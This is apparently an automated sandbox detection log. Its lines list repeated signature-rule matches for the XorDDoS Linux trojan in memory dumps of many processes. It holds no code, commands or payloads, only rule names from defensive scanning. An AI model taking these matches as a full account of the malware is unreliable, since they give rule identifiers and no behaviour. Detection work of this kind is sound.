Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6398.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6543.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6471.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6350.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6449.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6224.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6466.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6253.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6220.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6256.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6395.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6261.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6328.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6483.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6264.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6437.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6222.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6299.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
